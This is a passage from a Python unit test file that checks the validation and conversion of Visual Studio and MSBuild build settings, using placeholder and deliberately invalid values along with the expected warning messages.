'ObjectFile': 'a_file_name',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMP': 'true',
'Optimization': '1',
'PrecompiledHeaderFile': 'a_file_name',
'PrecompiledHeaderThrough': 'a_file_name',
'PreprocessorDefinitions': 'string1;string2',
'ProgramDataBaseFileName': 'a_file_name',
'RuntimeLibrary': '1',
'RuntimeTypeInfo': 'true',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '1',
'SuppressStartupBanner': 'true',
'TreatWChar_tAsBuiltInType': 'true',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'string1;string2',
'UseFullPaths': 'true',
'UsePrecompiledHeader': '1',
'UseUnicodeResponseFiles': 'true',
'WarnAsError': 'true',
'WarningLevel': '1',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': 'a_file_name',
'ZZXYZ': 'bogus'},
'VCLinkerTool': {
'AdditionalDependencies': 'file1;file2',
'AdditionalDependencies_excluded': 'file3',
'AdditionalLibraryDirectories': 'folder1;folder2',
'AdditionalManifestDependencies': 'file1;file2',
'AdditionalOptions': 'a string1',
'AddModuleNamesToAssembly': 'file1;file2',
'AllowIsolation': 'true',
'AssemblyDebug': '2',
'AssemblyLinkResource': 'file1;file2',
'BaseAddress': 'a string1',
'CLRImageType': '2',
'CLRThreadAttribute': '2',
'CLRUnmanagedCodeCheck': 'true',
'DataExecutionPrevention': '2',
'DelayLoadDLLs': 'file1;file2',
'DelaySign': 'true',
'Driver': '2',
'EmbedManagedResourceFile': 'file1;file2',
'EnableCOMDATFolding': '2',
'EnableUAC': 'true',
'EntryPointSymbol': 'a string1',
'ErrorReporting': '2',
'FixedBaseAddress': '2',
'ForceSymbolReferences': 'file1;file2',
'FunctionOrder': 'a_file_name',
'GenerateDebugInformation': 'true',
'GenerateManifest': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': 'a string1',
'HeapReserveSize': 'a string1',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreDefaultLibraryNames': 'file1;file2',
'IgnoreEmbeddedIDL': 'true',
'IgnoreImportLibrary': 'true',
'ImportLibrary': 'a_file_name',
'KeyContainer': 'a_file_name',
'KeyFile': 'a_file_name',
'LargeAddressAware': '2',
'LinkIncremental': '2',
'LinkLibraryDependencies': 'true',
'LinkTimeCodeGeneration': '2',
'ManifestFile': 'a_file_name',
'MapExports': 'true',
'MapFileName': 'a_file_name',
'MergedIDLBaseFileName': 'a_file_name',
'MergeSections': 'a string1',
'MidlCommandFile': 'a_file_name',
'ModuleDefinitionFile': 'a_file_name',
'OptimizeForWindows98': '1',
'OptimizeReferences': '2',
'OutputFile': 'a_file_name',
'PerUserRedirection': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': 'a_file_name',
'ProgramDatabaseFile': 'a_file_name',
'RandomizedBaseAddress': '2',
'RegisterOutput': 'true',
'ResourceOnlyDLL': 'true',
'SetChecksum': 'true',
'ShowProgress': '2',
'StackCommitSize': 'a string1',
'StackReserveSize': 'a string1',
'StripPrivateSymbols': 'a_file_name',
'SubSystem': '2',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'true',
'SwapRunFromCD': 'true',
'SwapRunFromNet': 'true',
'TargetMachine': '2',
'TerminalServerAware': '2',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'a_file_name',
'TypeLibraryResourceID': '33',
'UACExecutionLevel': '2',
'UACUIAccess': 'true',
'UseLibraryDependencyInputs': 'true',
'UseUnicodeResponseFiles': 'true',
'Version': 'a string1'},
'VCMIDLTool': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'CPreprocessOptions': 'a string1',
'DefaultCharType': '1',
'DLLDataFileName': 'a_file_name',
'EnableErrorChecks': '1',
'ErrorCheckAllocations': 'true',
'ErrorCheckBounds': 'true',
'ErrorCheckEnumRange': 'true',
'ErrorCheckRefPointers': 'true',
'ErrorCheckStubData': 'true',
'GenerateStublessProxies': 'true',
'GenerateTypeLibrary': 'true',
'HeaderFileName': 'a_file_name',
'IgnoreStandardIncludePath': 'true',
'InterfaceIdentifierFileName': 'a_file_name',
'MkTypLibCompatible': 'true',
'notgood': 'bogus',
'OutputDirectory': 'a string1',
'PreprocessorDefinitions': 'string1;string2',
'ProxyFileName': 'a_file_name',
'RedirectOutputAndErrors': 'a_file_name',
'StructMemberAlignment': '1',
'SuppressStartupBanner': 'true',
'TargetEnvironment': '1',
'TypeLibraryName': 'a_file_name',
'UndefinePreprocessorDefinitions': 'string1;string2',
'ValidateParameters': 'true',
'WarnAsError': 'true',
'WarningLevel': '1'},
'VCResourceCompilerTool': {
'AdditionalOptions': 'a string1',
'AdditionalIncludeDirectories': 'folder1;folder2',
'Culture': '1003',
'IgnoreStandardIncludePath': 'true',
'notgood2': 'bogus',
'PreprocessorDefinitions': 'string1;string2',
'ResourceOutputFileName': 'a string1',
'ShowProgress': 'true',
'SuppressStartupBanner': 'true',
'UndefinePreprocessorDefinitions': 'string1;string2'},
'VCLibrarianTool': {
'AdditionalDependencies': 'file1;file2',
'AdditionalLibraryDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'ExportNamedFunctions': 'string1;string2',
'ForceSymbolReferences': 'a string1',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2',
'LinkLibraryDependencies': 'true',
'ModuleDefinitionFile': 'a_file_name',
'OutputFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'UseUnicodeResponseFiles': 'true'},
'VCManifestTool': {
'AdditionalManifestFiles': 'file1;file2',
'AdditionalOptions': 'a string1',
'AssemblyIdentity': 'a string1',
'ComponentFileName': 'a_file_name',
'DependencyInformationFile': 'a_file_name',
'GenerateCatalogFiles': 'true',
'InputResourceManifests': 'a string1',
'ManifestResourceFile': 'a_file_name',
'OutputManifestFile': 'a_file_name',
'RegistrarScriptFile': 'a_file_name',
'ReplacementsFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'TypeLibraryFile': 'a_file_name',
'UpdateFileHashes': 'truel',
'UpdateFileHashesSearchPath': 'a_file_name',
'UseFAT32Workaround': 'true',
'UseUnicodeResponseFiles': 'true',
'VerboseOutput': 'true'}},
self.stderr)
self._ExpectedWarnings([
'Warning: for VCCLCompilerTool/BasicRuntimeChecks, '
'index value (5) not in expected range [0, 4)',
'Warning: for VCCLCompilerTool/BrowseInformation, '
"invalid literal for int() with base 10: 'fdkslj'",
'Warning: for VCCLCompilerTool/CallingConvention, '
'index value (-1) not in expected range [0, 4)',
'Warning: for VCCLCompilerTool/DebugInformationFormat, '
'converted value for 2 not specified.',
'Warning: unrecognized setting VCCLCompilerTool/Enableprefast',
'Warning: unrecognized setting VCCLCompilerTool/ZZXYZ',
'Warning: for VCLinkerTool/TargetMachine, '
'converted value for 2 not specified.',
'Warning: unrecognized setting VCMIDLTool/notgood',
'Warning: unrecognized setting VCResourceCompilerTool/notgood2',
'Warning: for VCManifestTool/UpdateFileHashes, '
"expected bool; got 'truel'"
''])
def testValidateMSBuildSettings_settings(self):
"""Tests that for invalid MSBuild settings."""
MSVSSettings.ValidateMSBuildSettings(
{'ClCompile': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': ['string1', 'string2'],
'AdditionalUsingDirectories': 'folder1;folder2',
'AssemblerListingLocation': 'a_file_name',
'AssemblerOutput': 'NoListing',
'BasicRuntimeChecks': 'StackFrameRuntimeCheck',
'BrowseInformation': 'false',
'BrowseInformationFile': 'a_file_name',
'BufferSecurityCheck': 'true',
'BuildingInIDE': 'true',
'CallingConvention': 'Cdecl',
'CompileAs': 'CompileAsC',
'CompileAsManaged': 'true',
'CreateHotpatchableImage': 'true',
'DebugInformationFormat': 'ProgramDatabase',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'string1;string2',
'EnableEnhancedInstructionSet': 'StreamingSIMDExtensions',
'EnableFiberSafeOptimizations': 'true',
'EnablePREfast': 'true',
'Enableprefast': 'bogus',
'ErrorReporting': 'Prompt',
'ExceptionHandling': 'SyncCThrow',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': 'Neither',
'FloatingPointExceptions': 'true',
'FloatingPointModel': 'Precise',
'ForceConformanceInForLoopScope': 'true',
'ForcedIncludeFiles': 'file1;file2',
'ForcedUsingFiles': 'file1;file2',
'FunctionLevelLinking': 'false',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': 'OnlyExplicitInline',
'IntrinsicFunctions': 'false',
'MinimalRebuild': 'true',
'MultiProcessorCompilation': 'true',
'ObjectFileName': 'a_file_name',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMPSupport': 'true',
'Optimization': 'Disabled',
'PrecompiledHeader': 'NotUsing',
'PrecompiledHeaderFile': 'a_file_name',
'PrecompiledHeaderOutputFile': 'a_file_name',
'PreprocessKeepComments': 'true',
'PreprocessorDefinitions': 'string1;string2',
'PreprocessOutputPath': 'a string1',
'PreprocessSuppressLineNumbers': 'false',
'PreprocessToFile': 'false',
'ProcessorNumber': '33',
'ProgramDataBaseFileName': 'a_file_name',
'RuntimeLibrary': 'MultiThreaded',
'RuntimeTypeInfo': 'true',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '1Byte',
'SuppressStartupBanner': 'true',
'TrackerLogDirectory': 'a_folder',
'TreatSpecificWarningsAsErrors': 'string1;string2',
'TreatWarningAsError': 'true',
'TreatWChar_tAsBuiltInType': 'true',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'string1;string2',
'UseFullPaths': 'true',
'UseUnicodeForAssemblerListing': 'true',
'WarningLevel': 'TurnOffAllWarnings',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': 'a_file_name',
'ZZXYZ': 'bogus'},
'Link': {
'AdditionalDependencies': 'file1;file2',
'AdditionalLibraryDirectories': 'folder1;folder2',
'AdditionalManifestDependencies': 'file1;file2',
'AdditionalOptions': 'a string1',
'AddModuleNamesToAssembly': 'file1;file2',
'AllowIsolation': 'true',
'AssemblyDebug': '',
'AssemblyLinkResource': 'file1;file2',
'BaseAddress': 'a string1',
'BuildingInIDE': 'true',
'CLRImageType': 'ForceIJWImage',
'CLRSupportLastError': 'Enabled',
'CLRThreadAttribute': 'MTAThreadingAttribute',
'CLRUnmanagedCodeCheck': 'true',
'CreateHotPatchableImage': 'X86Image',
'DataExecutionPrevention': 'false',
'DelayLoadDLLs': 'file1;file2',
'DelaySign': 'true',
'Driver': 'NotSet',
'EmbedManagedResourceFile': 'file1;file2',
'EnableCOMDATFolding': 'false',
'EnableUAC': 'true',
'EntryPointSymbol': 'a string1',
'FixedBaseAddress': 'false',
'ForceFileOutput': 'Enabled',
'ForceSymbolReferences': 'file1;file2',
'FunctionOrder': 'a_file_name',
'GenerateDebugInformation': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': 'a string1',
'HeapReserveSize': 'a string1',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreEmbeddedIDL': 'true',
'IgnoreSpecificDefaultLibraries': 'a_file_list',
'ImageHasSafeExceptionHandlers': 'true',
'ImportLibrary': 'a_file_name',
'KeyContainer': 'a_file_name',
'KeyFile': 'a_file_name',
'LargeAddressAware': 'false',
'LinkDLL': 'true',
'LinkErrorReporting': 'SendErrorReport',
'LinkStatus': 'true',
'LinkTimeCodeGeneration': 'UseLinkTimeCodeGeneration',
'ManifestFile': 'a_file_name',
'MapExports': 'true',
'MapFileName': 'a_file_name',
'MergedIDLBaseFileName': 'a_file_name',
'MergeSections': 'a string1',
'MidlCommandFile': 'a_file_name',
'MinimumRequiredVersion': 'a string1',
'ModuleDefinitionFile': 'a_file_name',
'MSDOSStubFileName': 'a_file_name',
'NoEntryPoint': 'true',
'OptimizeReferences': 'false',
'OutputFile': 'a_file_name',
'PerUserRedirection': 'true',
'PreventDllBinding': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': 'a_file_name',
'ProgramDatabaseFile': 'a_file_name',
'RandomizedBaseAddress': 'false',
'RegisterOutput': 'true',
'SectionAlignment': '33',
'SetChecksum': 'true',
'ShowProgress': 'LinkVerboseREF',
'SpecifySectionAttributes': 'a string1',
'StackCommitSize': 'a string1',
'StackReserveSize': 'a string1',
'StripPrivateSymbols': 'a_file_name',
'SubSystem': 'Console',
'SupportNobindOfDelayLoadedDLL': 'true',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'true',
'SwapRunFromCD': 'true',
'SwapRunFromNET': 'true',
'TargetMachine': 'MachineX86',
'TerminalServerAware': 'false',
'TrackerLogDirectory': 'a_folder',
'TreatLinkerWarningAsErrors': 'true',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'a_file_name',
'TypeLibraryResourceID': '33',
'UACExecutionLevel': 'AsInvoker',
'UACUIAccess': 'true',
'Version': 'a string1'},
'ResourceCompile': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'Culture': '0x236',
'IgnoreStandardIncludePath': 'true',
'NullTerminateStrings': 'true',
'PreprocessorDefinitions': 'string1;string2',
'ResourceOutputFileName': 'a string1',
'ShowProgress': 'true',
'SuppressStartupBanner': 'true',
'TrackerLogDirectory': 'a_folder',
'UndefinePreprocessorDefinitions': 'string1;string2'},
'Midl': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'ApplicationConfigurationMode': 'true',
'ClientStubFile': 'a_file_name',
'CPreprocessOptions': 'a string1',
'DefaultCharType': 'Signed',
'DllDataFileName': 'a_file_name',
'EnableErrorChecks': 'EnableCustom',
'ErrorCheckAllocations': 'true',
'ErrorCheckBounds': 'true',
'ErrorCheckEnumRange': 'true',
'ErrorCheckRefPointers': 'true',
'ErrorCheckStubData': 'true',
'GenerateClientFiles': 'Stub',
'GenerateServerFiles': 'None',
'GenerateStublessProxies': 'true',
'GenerateTypeLibrary': 'true',
'HeaderFileName': 'a_file_name',
'IgnoreStandardIncludePath': 'true',
'InterfaceIdentifierFileName': 'a_file_name',
'LocaleID': '33',
'MkTypLibCompatible': 'true',
'OutputDirectory': 'a string1',
'PreprocessorDefinitions': 'string1;string2',
'ProxyFileName': 'a_file_name',
'RedirectOutputAndErrors': 'a_file_name',
'ServerStubFile': 'a_file_name',
'StructMemberAlignment': 'NotSet',
'SuppressCompilerWarnings': 'true',
'SuppressStartupBanner': 'true',
'TargetEnvironment': 'Itanium',
'TrackerLogDirectory': 'a_folder',
'TypeLibFormat': 'NewFormat',
'TypeLibraryName': 'a_file_name',
'UndefinePreprocessorDefinitions': 'string1;string2',
'ValidateAllParameters': 'true',
'WarnAsError': 'true',
'WarningLevel': '1'},
'Lib': {
'AdditionalDependencies': 'file1;file2',
'AdditionalLibraryDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'DisplayLibrary': 'a string1',
'ErrorReporting': 'PromptImmediately',
'ExportNamedFunctions': 'string1;string2',
'ForceSymbolReferences': 'a string1',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2',
'LinkTimeCodeGeneration': 'true',
'MinimumRequiredVersion': 'a string1',
'ModuleDefinitionFile': 'a_file_name',
'Name': 'a_file_name',
'OutputFile': 'a_file_name',
'RemoveObjects': 'file1;file2',
'SubSystem': 'Console',
'SuppressStartupBanner': 'true',
'TargetMachine': 'MachineX86i',
'TrackerLogDirectory': 'a_folder',
'TreatLibWarningAsErrors': 'true',
'UseUnicodeResponseFiles': 'true',
'Verbose': 'true'},
'Manifest': {
'AdditionalManifestFiles': 'file1;file2',
'AdditionalOptions': 'a string1',
'AssemblyIdentity': 'a string1',
'ComponentFileName': 'a_file_name',
'EnableDPIAwareness': 'fal',
'GenerateCatalogFiles': 'truel',
'GenerateCategoryTags': 'true',
'InputResourceManifests': 'a string1',
'ManifestFromManagedAssembly': 'a_file_name',
'notgood3': 'bogus',
'OutputManifestFile': 'a_file_name',
'OutputResourceManifests': 'a string1',
'RegistrarScriptFile': 'a_file_name',
'ReplacementsFile': 'a_file_name',
'SuppressDependencyElement': 'true',
'SuppressStartupBanner': 'true',
'TrackerLogDirectory': 'a_folder',
'TypeLibraryFile': 'a_file_name',
'UpdateFileHashes': 'true',
'UpdateFileHashesSearchPath': 'a_file_name',
'VerboseOutput': 'true'},
'ProjectReference': {
'LinkLibraryDependencies': 'true',
'UseLibraryDependencyInputs': 'true'},
'ManifestResourceCompile': {
'ResourceOutputFileName': 'a_file_name'},
'': {
'EmbedManifest': 'true',
'GenerateManifest': 'true',
'IgnoreImportLibrary': 'true',
'LinkIncremental': 'false'}},
self.stderr)
self._ExpectedWarnings([
'Warning: unrecognized setting ClCompile/Enableprefast',
'Warning: unrecognized setting ClCompile/ZZXYZ',
'Warning: unrecognized setting Manifest/notgood3',
'Warning: for Manifest/GenerateCatalogFiles, '
"expected bool; got 'truel'",
'Warning: for Lib/TargetMachine, unrecognized enumerated value '
'MachineX86i',
"Warning: for Manifest/EnableDPIAwareness, expected bool; got 'fal'"])
def testConvertToMSBuildSettings_empty(self):
"""Tests an empty conversion."""
msvs_settings = {}
expected_msbuild_settings = {}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([])
def testConvertToMSBuildSettings_minimal(self):
"""Tests a minimal conversion."""
msvs_settings = {
'VCCLCompilerTool': {
'AdditionalIncludeDirectories': 'dir1',
'AdditionalOptions': '/foo',
'BasicRuntimeChecks': '0',
},
'VCLinkerTool': {
'LinkTimeCodeGeneration': '1',
'ErrorReporting': '1',
'DataExecutionPrevention': '2',
},
}
expected_msbuild_settings = {
'ClCompile': {
'AdditionalIncludeDirectories': 'dir1',
'AdditionalOptions': '/foo',
'BasicRuntimeChecks': 'Default',
},
'Link': {
'LinkTimeCodeGeneration': 'UseLinkTimeCodeGeneration',
'LinkErrorReporting': 'PromptImmediately',
'DataExecutionPrevention': 'true',
},
}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([])
def testConvertToMSBuildSettings_warnings(self):
"""Tests conversion that generates warnings."""
msvs_settings = {
'VCCLCompilerTool': {
'AdditionalIncludeDirectories': '1',
'AdditionalOptions': '2',
# These are incorrect values:
'BasicRuntimeChecks': '12',
'BrowseInformation': '21',
'UsePrecompiledHeader': '13',
'GeneratePreprocessedFile': '14'},
'VCLinkerTool': {
# These are incorrect values:
'Driver': '10',
'LinkTimeCodeGeneration': '31',
'ErrorReporting': '21',
'FixedBaseAddress': '6'},
'VCResourceCompilerTool': {
# Custom
'Culture': '1003'}}
expected_msbuild_settings = {
'ClCompile': {
'AdditionalIncludeDirectories': '1',
'AdditionalOptions': '2'},
'Link': {},
'ResourceCompile': {
# Custom
'Culture': '0x03eb'}}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([
'Warning: while converting VCCLCompilerTool/BasicRuntimeChecks to '
'MSBuild, index value (12) not in expected range [0, 4)',
'Warning: while converting VCCLCompilerTool/BrowseInformation to '
'MSBuild, index value (21) not in expected range [0, 3)',
'Warning: while converting VCCLCompilerTool/UsePrecompiledHeader to '
'MSBuild, index value (13) not in expected range [0, 3)',
'Warning: while converting VCCLCompilerTool/GeneratePreprocessedFile to '
'MSBuild, value must be one of [0, 1, 2]; got 14',
'Warning: while converting VCLinkerTool/Driver to '
'MSBuild, index value (10) not in expected range [0, 4)',
'Warning: while converting VCLinkerTool/LinkTimeCodeGeneration to '
'MSBuild, index value (31) not in expected range [0, 5)',
'Warning: while converting VCLinkerTool/ErrorReporting to '
'MSBuild, index value (21) not in expected range [0, 3)',
'Warning: while converting VCLinkerTool/FixedBaseAddress to '
'MSBuild, index value (6) not in expected range [0, 3)',
])
def testConvertToMSBuildSettings_full_synthetic(self):
"""Tests conversion of all the MSBuild settings."""
msvs_settings = {
'VCCLCompilerTool': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'AdditionalUsingDirectories': 'folder1;folder2;folder3',
'AssemblerListingLocation': 'a_file_name',
'AssemblerOutput': '0',
'BasicRuntimeChecks': '1',
'BrowseInformation': '2',
'BrowseInformationFile': 'a_file_name',
'BufferSecurityCheck': 'true',
'CallingConvention': '0',
'CompileAs': '1',
'DebugInformationFormat': '4',
'DefaultCharIsUnsigned': 'true',
'Detect64BitPortabilityProblems': 'true',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'd1;d2;d3',
'EnableEnhancedInstructionSet': '0',
'EnableFiberSafeOptimizations': 'true',
'EnableFunctionLevelLinking': 'true',
'EnableIntrinsicFunctions': 'true',
'EnablePREfast': 'true',
'ErrorReporting': '1',
'ExceptionHandling': '2',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': '0',
'FloatingPointExceptions': 'true',
'FloatingPointModel': '1',
'ForceConformanceInForLoopScope': 'true',
'ForcedIncludeFiles': 'file1;file2;file3',
'ForcedUsingFiles': 'file1;file2;file3',
'GeneratePreprocessedFile': '1',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': '2',
'KeepComments': 'true',
'MinimalRebuild': 'true',
'ObjectFile': 'a_file_name',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMP': 'true',
'Optimization': '3',
'PrecompiledHeaderFile': 'a_file_name',
'PrecompiledHeaderThrough': 'a_file_name',
'PreprocessorDefinitions': 'd1;d2;d3',
'ProgramDataBaseFileName': 'a_file_name',
'RuntimeLibrary': '0',
'RuntimeTypeInfo': 'true',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '1',
'SuppressStartupBanner': 'true',
'TreatWChar_tAsBuiltInType': 'true',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'd1;d2;d3',
'UseFullPaths': 'true',
'UsePrecompiledHeader': '1',
'UseUnicodeResponseFiles': 'true',
'WarnAsError': 'true',
'WarningLevel': '2',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': 'a_file_name'},
'VCLinkerTool': {
'AdditionalDependencies': 'file1;file2;file3',
'AdditionalLibraryDirectories': 'folder1;folder2;folder3',
'AdditionalLibraryDirectories_excluded': 'folder1;folder2;folder3',
'AdditionalManifestDependencies': 'file1;file2;file3',
'AdditionalOptions': 'a_string',
'AddModuleNamesToAssembly': 'file1;file2;file3',
'AllowIsolation': 'true',
'AssemblyDebug': '0',
'AssemblyLinkResource': 'file1;file2;file3',
'BaseAddress': 'a_string',
'CLRImageType': '1',
'CLRThreadAttribute': '2',
'CLRUnmanagedCodeCheck': 'true',
'DataExecutionPrevention': '0',
'DelayLoadDLLs': 'file1;file2;file3',
'DelaySign': 'true',
'Driver': '1',
'EmbedManagedResourceFile': 'file1;file2;file3',
'EnableCOMDATFolding': '0',
'EnableUAC': 'true',
'EntryPointSymbol': 'a_string',
'ErrorReporting': '0',
'FixedBaseAddress': '1',
'ForceSymbolReferences': 'file1;file2;file3',
'FunctionOrder': 'a_file_name',
'GenerateDebugInformation': 'true',
'GenerateManifest': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': 'a_string',
'HeapReserveSize': 'a_string',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreDefaultLibraryNames': 'file1;file2;file3',
'IgnoreEmbeddedIDL': 'true',
'IgnoreImportLibrary': 'true',
'ImportLibrary': 'a_file_name',
'KeyContainer': 'a_file_name',
'KeyFile': 'a_file_name',
'LargeAddressAware': '2',
'LinkIncremental': '1',
'LinkLibraryDependencies': 'true',
'LinkTimeCodeGeneration': '2',
'ManifestFile': 'a_file_name',
'MapExports': 'true',
'MapFileName': 'a_file_name',
'MergedIDLBaseFileName': 'a_file_name',
'MergeSections': 'a_string',
'MidlCommandFile': 'a_file_name',
'ModuleDefinitionFile': 'a_file_name',
'OptimizeForWindows98': '1',
'OptimizeReferences': '0',
'OutputFile': 'a_file_name',
'PerUserRedirection': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': 'a_file_name',
'ProgramDatabaseFile': 'a_file_name',
'RandomizedBaseAddress': '1',
'RegisterOutput': 'true',
'ResourceOnlyDLL': 'true',
'SetChecksum': 'true',
'ShowProgress': '0',
'StackCommitSize': 'a_string',
'StackReserveSize': 'a_string',
'StripPrivateSymbols': 'a_file_name',
'SubSystem': '2',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'true',
'SwapRunFromCD': 'true',
'SwapRunFromNet': 'true',
'TargetMachine': '3',
'TerminalServerAware': '2',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'a_file_name',
'TypeLibraryResourceID': '33',
'UACExecutionLevel': '1',
'UACUIAccess': 'true',
'UseLibraryDependencyInputs': 'false',
'UseUnicodeResponseFiles': 'true',
'Version': 'a_string'},
'VCResourceCompilerTool': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'Culture': '1003',
'IgnoreStandardIncludePath': 'true',
'PreprocessorDefinitions': 'd1;d2;d3',
'ResourceOutputFileName': 'a_string',
'ShowProgress': 'true',
'SuppressStartupBanner': 'true',
'UndefinePreprocessorDefinitions': 'd1;d2;d3'},
'VCMIDLTool': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'CPreprocessOptions': 'a_string',
'DefaultCharType': '0',
'DLLDataFileName': 'a_file_name',
'EnableErrorChecks': '2',
'ErrorCheckAllocations': 'true',
'ErrorCheckBounds': 'true',
'ErrorCheckEnumRange': 'true',
'ErrorCheckRefPointers': 'true',
'ErrorCheckStubData': 'true',
'GenerateStublessProxies': 'true',
'GenerateTypeLibrary': 'true',
'HeaderFileName': 'a_file_name',
'IgnoreStandardIncludePath': 'true',
'InterfaceIdentifierFileName': 'a_file_name',
'MkTypLibCompatible': 'true',
'OutputDirectory': 'a_string',
'PreprocessorDefinitions': 'd1;d2;d3',
'ProxyFileName': 'a_file_name',
'RedirectOutputAndErrors': 'a_file_name',
'StructMemberAlignment': '3',
'SuppressStartupBanner': 'true',
'TargetEnvironment': '1',
'TypeLibraryName': 'a_file_name',
'UndefinePreprocessorDefinitions': 'd1;d2;d3',
'ValidateParameters': 'true',
'WarnAsError': 'true',
'WarningLevel': '4'},
'VCLibrarianTool': {
'AdditionalDependencies': 'file1;file2;file3',
'AdditionalLibraryDirectories': 'folder1;folder2;folder3',
'AdditionalLibraryDirectories_excluded': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'ExportNamedFunctions': 'd1;d2;d3',
'ForceSymbolReferences': 'a_string',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2;file3',
'LinkLibraryDependencies': 'true',
'ModuleDefinitionFile': 'a_file_name',
'OutputFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'UseUnicodeResponseFiles': 'true'},
'VCManifestTool': {
'AdditionalManifestFiles': 'file1;file2;file3',
'AdditionalOptions': 'a_string',
'AssemblyIdentity': 'a_string',
'ComponentFileName': 'a_file_name',
'DependencyInformationFile': 'a_file_name',
'EmbedManifest': 'true',
'GenerateCatalogFiles': 'true',
'InputResourceManifests': 'a_string',
'ManifestResourceFile': 'my_name',
'OutputManifestFile': 'a_file_name',
'RegistrarScriptFile': 'a_file_name',
'ReplacementsFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'TypeLibraryFile': 'a_file_name',
'UpdateFileHashes': 'true',
'UpdateFileHashesSearchPath': 'a_file_name',
'UseFAT32Workaround': 'true',
'UseUnicodeResponseFiles': 'true',
'VerboseOutput': 'true'}}
expected_msbuild_settings = {
'ClCompile': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string /J',
'AdditionalUsingDirectories': 'folder1;folder2;folder3',
'AssemblerListingLocation': 'a_file_name',
'AssemblerOutput': 'NoListing',
'BasicRuntimeChecks': 'StackFrameRuntimeCheck',
'BrowseInformation': 'true',
'BrowseInformationFile': 'a_file_name',
'BufferSecurityCheck': 'true',
'CallingConvention': 'Cdecl',
'CompileAs': 'CompileAsC',
'DebugInformationFormat': 'EditAndContinue',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'd1;d2;d3',
'EnableEnhancedInstructionSet': 'NotSet',
'EnableFiberSafeOptimizations': 'true',
'EnablePREfast': 'true',
'ErrorReporting': 'Prompt',
'ExceptionHandling': 'Async',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': 'Neither',
'FloatingPointExceptions': 'true',
'FloatingPointModel': 'Strict',
'ForceConformanceInForLoopScope': 'true',
'ForcedIncludeFiles': 'file1;file2;file3',
'ForcedUsingFiles': 'file1;file2;file3',
'FunctionLevelLinking': 'true',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': 'AnySuitable',
'IntrinsicFunctions': 'true',
'MinimalRebuild': 'true',
'ObjectFileName': 'a_file_name',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMPSupport': 'true',
'Optimization': 'Full',
'PrecompiledHeader': 'Create',
